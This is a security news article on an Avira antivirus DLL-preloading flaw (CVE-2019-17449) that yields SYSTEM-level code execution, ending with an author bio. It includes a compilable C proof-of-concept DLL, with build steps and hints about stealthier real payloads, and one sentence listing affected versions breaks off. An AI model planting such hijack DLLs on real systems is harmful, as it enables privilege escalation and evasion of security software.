Exploitation of a vulnerability in Avira antivirus can escalate privileges to SYSTEM

Exploiting a vulnerability in Avira antivirus allows an attacker to bypass protection on the target system, establish persistence and escalate privileges.

SafeBreach researchers have discovered a dangerous vulnerability in the Avira 2019 antivirus product (CVE-2019-17449). Exploiting it allows an attacker to bypass protection on the target system, establish persistence and escalate privileges by getting a signed Avira process to load an arbitrary unsigned DLL.

“The vulnerability gives attackers the ability to load and execute malicious payloads within the context of Avira signed processes. This ability might be abused by an attacker for different purposes such as execution and evasion, for example: Application Whitelisting Bypass,” write SafeBreach experts.

SafeBreach experts examined the Avira ServiceHost service (Avira Launcher service). Avira.ServiceHost.exe is a signed process that runs as NT AUTHORITY\SYSTEM and is the first service installed when the product is set up. According to the researchers, on startup Avira.ServiceHost.exe attempts to load Wintrust.dll from its own directory first, and the library is not there; an attacker who places a DLL of that name in the application directory therefore gets it loaded ahead of the genuine copy in System32 (classic DLL preloading via the Windows DLL search order). The vulnerability affects versions of Avira Launcher below 1.2.137 and versions of Avira Software Updater below


As a rule, anti-virus products restrict modifications (adding, writing or changing files) in their own folders with a mini-filter driver that enforces a read-only policy for every user, including Administrator. For the experiment, the researchers compiled a DLL that, when loaded, writes three things to a text file: the name of the process that loaded it, the user account that process runs under, and the DLL's own name.
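To make the mechanism in the two paragraphs above concrete, here is an added proof-of-concept DLL of the kind the researchers describe. It is written for this article and is not SafeBreach's or Avira's code. It assumes the DLL is built with a MinGW cross-compiler (for example `x86_64-w64-mingw32-gcc -shared -o Wintrust.dll poc.c -ladvapi32`, matching the bitness of the host process), is named after the missing library (Wintrust.dll), and is dropped into the application directory of the signed process; the log path is a hypothetical choice. The Windows-specific part is guarded by `_WIN32` so the portable record-formatting helper can be compiled and checked on any platform.

```c
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* Portable core: build the single record the PoC appends to its log file.
 * Returns the number of bytes written, or -1 if the record does not fit. */
int format_record(char *out, size_t out_len,
                  const char *process, const char *user, const char *dll)
{
    int n = snprintf(out, out_len, "process=%s user=%s dll=%s\n",
                     process, user, dll);
    if (n < 0 || (size_t)n >= out_len)
        return -1;
    return n;
}

#ifdef _WIN32
/* Hypothetical log location, chosen because it is readable afterwards
 * from a normal account; SYSTEM can write anywhere. */
static const char LOG_PATH[] = "C:\\Windows\\Temp\\dll_preload_poc.txt";

/* Entry point the loader calls as soon as the host process maps the DLL.
 * The host never has to call any export: DllMain alone proves execution
 * inside the signed process. Note this runs under the loader lock, so the
 * PoC keeps to a few already-loaded system APIs and does no heavy work. */
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    char process[MAX_PATH], dll[MAX_PATH], user[256];
    char line[2 * MAX_PATH + 300];
    DWORD user_len = sizeof user;
    FILE *f;
    (void)reserved;

    if (reason != DLL_PROCESS_ATTACH)
        return TRUE;
    DisableThreadLibraryCalls(hinst);

    /* NULL module handle = the host executable, i.e. whoever loaded us. */
    if (!GetModuleFileNameA(NULL, process, sizeof process))
        strcpy(process, "?");
    /* Our own handle = full path of this DLL, proving where it was picked up. */
    if (!GetModuleFileNameA(hinst, dll, sizeof dll))
        strcpy(dll, "?");
    /* Account name of the host's token: "SYSTEM" for the Avira service host. */
    if (!GetUserNameA(user, &user_len))
        strcpy(user, "?");

    if (format_record(line, sizeof line, process, user, dll) > 0 &&
        (f = fopen(LOG_PATH, "a")) != NULL) {
        fputs(line, f);
        fclose(f);
    }
    return TRUE;  /* keep the host running so nothing looks amiss */
}
#endif
```

Once the DLL is in place, restarting the service (or rebooting) is enough to get the record written; a real payload would do its work in a new thread rather than inside DllMain. The same file, renamed, serves to probe the other services mentioned below, since each loads by name from its own directory.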

“We managed to load an arbitrary DLL and execute the code inside Avira.ServiceHost.exe, which was signed by Avira Operations GmbH & Co. KG and is executed as NT AUTHORITY\SYSTEM,” the experts say.

The researchers carried out the same attack against other Avira services (System Speedup, Software Updater and Optimizer Host).

The experts describe three ways the vulnerability can be abused: bypassing the anti-virus product's self-protection; loading and executing a malicious payload in the context of an Avira-signed process; and establishing persistence on the system.

The researchers notified the company about the vulnerability in July 2019. In September, Avira released a patched version of Launcher (1.2.137).

William Reddy

I am from Ireland. My parents bought me a computer when I was 11, and several months later I got a virus on this PC. I decided to enter the INSA Centre Val de Loire university after graduating from school. This French educational institution was offering a brand-new cybersecurity course. After getting a master's degree in cybersecurity, I started working as a virus analyst at a small anti-malware vendor. In 2018, I decided to start the Virus Removal project. The main goal of this site is to help people deal with PC viruses of any kind.
